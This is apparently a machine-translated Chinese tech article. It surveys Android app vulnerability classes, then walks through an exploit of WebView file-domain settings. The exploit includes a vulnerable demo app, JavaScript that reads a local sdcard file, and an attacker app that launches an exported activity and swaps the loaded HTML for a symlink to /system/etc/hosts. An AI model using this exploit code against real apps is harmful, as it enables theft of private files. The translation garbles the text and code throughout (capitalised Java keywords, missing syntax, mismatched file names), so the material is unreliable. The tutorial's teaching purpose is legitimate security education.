Shulou(Shulou.com)05/31 Report--

WebView File domain homology strategy bypass loophole example analysis, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Basic knowledge Android architecture

Kernel inner nuclear layer

The vulnerability is extremely harmful and versatile.

Because there are many and miscellaneous drivers, there may be many loopholes.

Libaries system runtime layer

Runtime provided in the form of system middleware

Including libc, WebKit, SQLite, etc.

AndroidRunTime

Dalvik virtual machine and kernel library

FrameWork application framework layer

Provides a range of services and interfaces to API

Activity Manager

Content provider

View

Resource manager

Notification Manager

Application application layer

System application

Other applications

Programs implemented by developers using API in the application framework layer

Common components of Andoroid

Acitivity activity

Service service

BroadcastRecviver broadcast receiver

ContentProvider content provider

Android App Common vulnerabilities (OWASP Mobile Top 10) improper use of platform

Overview

Abuse of platform functions, or failure to use the security control of the platform. Such as misuse of Intent, misuse of permissions, etc.

Risk

It is extensive and may involve various services on the mobile platform.

Give an example

In iOS, password data is stored in a local file rather than in a key chain, resulting in reading from pseudo-encrypted backup data

In Android system, improper use of Intent causes malicious users to hijack and modify the contents of intent and perform arbitrary actions with the privileges of the original process.

Insecure data storage

Insecure communication

Typical loopholes and Mining methods data Storage loopholes

Data file or directory

Plaintext storage

MODE_PRIVATE

Plaintext storage

The MODE_PRIVATE schema was not used when creating the database

The MODE_PRIVATE mode is not used when creating the configuration file, causing other programs to read the configuration file

Plaintext storage, while root users can read, resulting in sensitive data disclosure

SharedPreferences

Data/data/ package name / shared_prefs/*.xml

SQLiteDatabases

Data/data package name / database/*.db

InternalStorage

Data/data/ program registration / files/*

ExternalStorage

/ mnt/sdcard/*

Detection method

Browse the files and directories under the / data/data/ package name directory to check if there are files that can be read by the others user

Check whether plaintext sensitive information exists in configuration files, databases, etc.

Mining method

Code detection

Check whether the mode parameter of openFileOutput, getSharedPrefreences, openOrCreateDatabase and other functions is MODE_PRIVATE (0x0000)

Data communication vulnerability

Use plaintext protocols such as HTTP to transmit sensitive information to the server

Plaintext communication is captured by means of local area network sniffing, malicious public WIFI, malicious proxy service, DNS hijacking and so on, resulting in man-in-the-middle attacks.

Weak check of SSL certificate

Search for .method public checkServerTrusted

Locate .method and end method

Check for the presence of return-void

Similarly, check whether the return value of verify (String, SSLSession) is always True and whether the parameter of X509HostnameVerifier is ALLOW_ALLHOSTNAME_VERIFIER.

Open the Fiddler agent and allow the remote host to connect to the agent

Lack of verification of SSL certificates in APP

The X509TruestManager class should be implemented in the client, including three methods: checkServerTrusted\ checkClientTrusted\ getInstance

The failure of certificate verification results in an exception, which is then handled by the application

Failure to validate server certificates can lead to TLS man-in-the-middle attacks

Or when setting the HostnameVerifier of HttpsURLConnection, set it to ALLOW_ALL_HOSTNAME_VERIIER to accept all domain names.

Attack method

Mining method

Strong verification of SSL certificate

It may be bypassed by Xp, Patch, etc.

Component exposure vulnerability

If there is intent-filter, the default value is true;. Otherwise, it is false.

Permission Control of exported Export component

Bypass authentication

Activity is called by a third party after exposure, and may log in / reset the password without a password

Sensitive information disclosure

Recviver is started by a third party after exposure, and sensitive information such as debugging may be viewed.

Ultra vires behavior

Low-privilege programs perform high-privilege actions by calling components exposed by high-privilege programs.

Mining method

View AndroidManifest.xml

Security assessment through drozer's attacksurface tool

Weak encryption vulnerability

Password hard coding

Decompilation, root viewing, etc. can be obtained.

AES/DES weak encryption

ECB mode is vulnerable to analysis or replay attacks.

WebView

It mainly includes three kinds of vulnerabilities:

Arbitrary code execution

Write a web page that traverses the object. If there is a getClass method, there is a remote code execution vulnerability.

Fiddler's before script allows any webview to test when visiting any web page.

After Android4.2, the method annotated by addJavascriptInterface can be called by the java method in the web page. If not filtered, there may be vulnerabilities.

Mining method:

Domain control is not strict

SetAllowFileAccess

SetAllowFileAccessFromFileURLs

SetAllowUniversalAccessFromFileURLs (causing sensitive information to be disclosed remotely)

Local files can be accessed through symbolic link attacks: js can access this file no matter how restricted it is. The file pointed to by the symbolic link can be read by delaying execution and replacing the current file with a soft connection that points to another file.

If WebView turns on the support for JavaScript and does not restrict the URL in the form of file:///, it will lead to the disclosure of sensitive information such as coookie, private files, databases, etc.

Password plaintext storage

When the user chooses to save the user name and password entered in WebViEW, it will be saved in clear text to data.db in the app directory

Attackers with root privileges can read

Summary of vulnerability mining process

Static analysis

Rapid detection to obtain the key target of analysis

Check the AndroidManifest file

Script parses Smali code

Dynamic analysis

Verification and hazard assessment of suspected risks

Debug mode analysis

Attempted operation / vulnerability verification

Drozer

Grab packet Analysis data and Interface

Reverse analysis

Encryption cracking and further analysis of logic and code

-

Automatic auxiliary system

MobSF includes front-end web interface

Marvin includes front-end web interface, so deployment is troublesome.

Inspeckage Xposed plug-in

Today we're going to talk about the vulnerabilities of WebView.

[Java] View copy code in plain text

?

Example code address: https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo.

Or my github: https://github.com/MaxSecret/AppVulnerability/tree/master/WebViewFileDemo1.

The main difference in the code as follows is that the attack_file.html loaded this time

Public class MainActivity extends Activity {

Private WebView webView

Private Uri mUri

Private String url

String mUrl1 = "file:///android_asset/html/attack_file.html";

/ / String mUrl2 = "file:///android_asset/html/test.html";

@ Override

Protected void onCreate (Bundle savedInstanceState) {

Super.onCreate (savedInstanceState)

SetContentView (R.layout.activity_main)

WebView = (WebView) findViewById (R.id.webview)

WebView.getSettings () setJavaScriptEnabled (true)

WebView.addJavascriptInterface (new JSInterface (), "jsInterface")

WebView.getSettings () setAllowFileAccessFromFileURLs (true)

WebView.setWebChromeClient (new WebChromeClient () {

@ Override

Public boolean onJsAlert (WebView view, String url, String message,JsResult result) {

/ / Required functionality here

Return super.onJsAlert (view, url, message, result)

}

});

WebView.loadUrl (mUrl1)

}

Class JSInterface {

Public String onButtonClick (String text) {

Final String str = text

RunOnUiThread (new Runnable () {

@ Override

Public void run () {

Log.e ("leehong2", "onButtonClick: text =" + str)

Toast.makeText (getApplicationContext (), "onButtonClick: text =" + str, Toast.LENGTH_LONG) .show ()

}

});

Return "This text is returned from Java layer. Js text =" + text

}

Public void onImageClick (String url, int width, int height) {

Final String str = "onImageClick: text =" + url + "width =" + width + "height =" + height

Log.i ("leehong2", str)

RunOnUiThread (new Runnable () {

@ Override

Public void run () {

Toast.makeText (getApplicationContext (), str, Toast.LENGTH_LONG). Show ()

}

});

}

}

}

Here webView.getSettings (). SetAllowFileAccessFromFileURLs (true) indicates that the file file can be accessed through javaScript.

Let's take a look at the attack_file.html code:'

Function stealFile ()

{

Var file = "file:///mnt/sdcard/233.txt";

Var xmlHttpReq = new XMLHttpRequest ()

XmlHttpReq.onreadystatechange = function () {

If (xmlHttpReq.readyState = = 4) {

Alert (xmlHttpReq.responseText)

}

}

XmlHttpReq.open ("GET", file)

XmlHttpReq.send (null)

}

StealFile ()

Because setAllowFileAccessFromFileURLs is true, the html of webView.load can return the value of / mnt/sdcard/2333.txt.

The html cannot return the value of / mnt/sdcard/2333.txt if setAllowFileAccessFromFileURLs is false,webView.load.

Even if setAllowFileAccessFromFileURLs is false, we can cross this limit in one way, which I'll talk about next time.

First run WebViewFileDemo1, then run AttackWebView to attack WebView.

Let's first take a look at WebViewFileDemo1. The main code is as follows:

Package com.example.webviewfiledemo; [/ size] [/ font] [/ p]

Import android.app.Activity

Import android.content.Intent

Import android.net.Uri

Import android.os.Bundle

Import android.util.Log

Import android.webkit.JsResult

Import android.webkit.WebChromeClient

Import android.webkit.WebView

Import android.widget.Toast

Public class MainActivity extends Activity {

Private WebView webView

Private Uri mUri

Private String url

@ Override

Protected void onCreate (Bundle savedInstanceState) {

Super.onCreate (savedInstanceState)

SetContentView (R.layout.activity_main)

WebView = (WebView) findViewById (R.id.webview)

WebView.getSettings () setJavaScriptEnabled (true)

WebView.addJavascriptInterface (new JSInterface (), "jsInterface")

WebView.getSettings () setAllowFileAccessFromFileURLs (false)

/ webView.getSettings () .setAllowFileAccess (false)

WebView.setWebChromeClient (new WebChromeClient () {

@ Override

Public boolean onJsAlert (WebView view, String url, String message,JsResult result) {

/ / Required functionality here

Return super.onJsAlert (view, url, message, result)

}

});

Intent I = getIntent ()

If (I! = null) {

MUri = i.getData ()

}

If (mUri! = null) {

Url = mUri.toString ()

}

If (url! = null) {

WebView.loadUrl (url)

}

}

}

This Activity receives the Intent from the outside, extracts the url from the Intent and loads it.

Then let's take a look at the AttackWebView project, which is the project that sends Intent to com.example.webviewfiledemo.MainActivity. The code is as follows:

Public class MainActivity extends Activity {

Public final static String HTML =

"" +

"Wait a few seconds." +

"" +

"var d = document;" +

"function doitjs () {" +

"var xhr = new XMLHttpRequest;" +

"xhr.onload = function () {" +

"var txt = xhr.responseText;" +

"d.body.appendChild (d.createTextNode (txt));" +

"alert (txt);" + "};" +

"xhr.open ('GET',d.URL);" +

"xhr.send (null);" +

"}" +

"setTimeout (doitjs,8000);" +

"" +

"

Public static String MY_TMP_DIR

@ Override

Protected void onCreate (Bundle savedInstanceState) {

Super.onCreate (savedInstanceState)

SetContentView (R.layout.activity_main)

MY_TMP_DIR = getDir ("payload_odex", MODE_PRIVATE) .getAbsolutePath ()

Doit ()

}

Public void doit () {

String HTML_PATH = MY_TMP_DIR + "/ A0" + ".html"

Try {

Cmdexec ("mkdir" + MY_TMP_DIR)

Cmdexec ("echo\" + HTML + "\" > "+ HTML_PATH)

Cmdexec ("chmod-R 777" + MY_TMP_DIR)

Thread.sleep (1000)

InvokeVulnAPP ("file://" + HTML_PATH)

Thread.sleep (6000)

Cmdexec ("rm" + HTML_PATH)

Cmdexec ("ln-s" + "/ system/etc/hosts" + HTML_PATH)

} catch (Exception e) {

/ / TODO: handle exception

}

}

Public void invokeVulnAPP (String url) {

Try {

Intent intent = new Intent (Intent.ACTION_MAIN,Uri.parse (url))

Intent.addCategory (Intent.CATEGORY_LAUNCHER)

Intent.setClassName ("com.example.webviewfiledemo", "com.example.webviewfiledemo.MainActivity")

StartActivity (intent)

} catch (Exception e) {

/ / TODO: handle exception

}

}

Public void cmdexec (String cmd) {

Try {

String [] tmp = new String [] {"/ system/bin/sh", "- c", cmd}

Runtime.getRuntime () exec (tmp)

} catch (Exception e) {

/ / TODO: handle exception

}

}

}

With invokeVulnAPP, com.example.webviewfiledemo.MainActivity is opened and Intent is passed. The Activity extracts the Url,Url and loads the html,html content for / sdcard/payload_odex/A0.html,webView as follows:

Public final static String HTML =

"" +

"Wait a few seconds." +

"" +

"var d = document;" +

"function doitjs () {" +

"var xhr = new XMLHttpRequest;" +

"xhr.onload = function () {" +

"var txt = xhr.responseText;" +

"d.body.appendChild (d.createTextNode (txt));" +

"alert (txt);" + "};" +

"xhr.open ('GET',d.URL);" +

"xhr.send (null);" +

"}" +

"setTimeout (doitjs,8000);" +

"" +

"

When the webView loads the A0.html in the WebViewFileDemo1 project, the function of this html is to delay reading the A0.html itself by 8 seconds. Let's go back to the AttackWebView project and look at the code.

Cmdexec ("mkdir" + MY_TMP_DIR)

Cmdexec ("echo\"+ HTML +"\ ">" + HTML_PATH); cmdexec ("chmod-R 777" + MY_TMP_DIR)

Thread.sleep (1000)

InvokeVulnAPP ("file://" + HTML_PATH)

Thread.sleep (6000)

Cmdexec ("rm" + HTML_PATH)

Cmdexec ("ln-s" + "/ system/etc/hosts" + HTML_PATH)

After invoking invokeVulnAPP, six seconds later, we first delete the A0.html and then reconnect to / system/etc/hosts. Note that when webView loads A0.html in the WebViewFileDemo1 project, the function of this html is to delay reading the A0.html itself by 8 seconds, so the read after 8 seconds is soft connection / system/etc/hosts.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.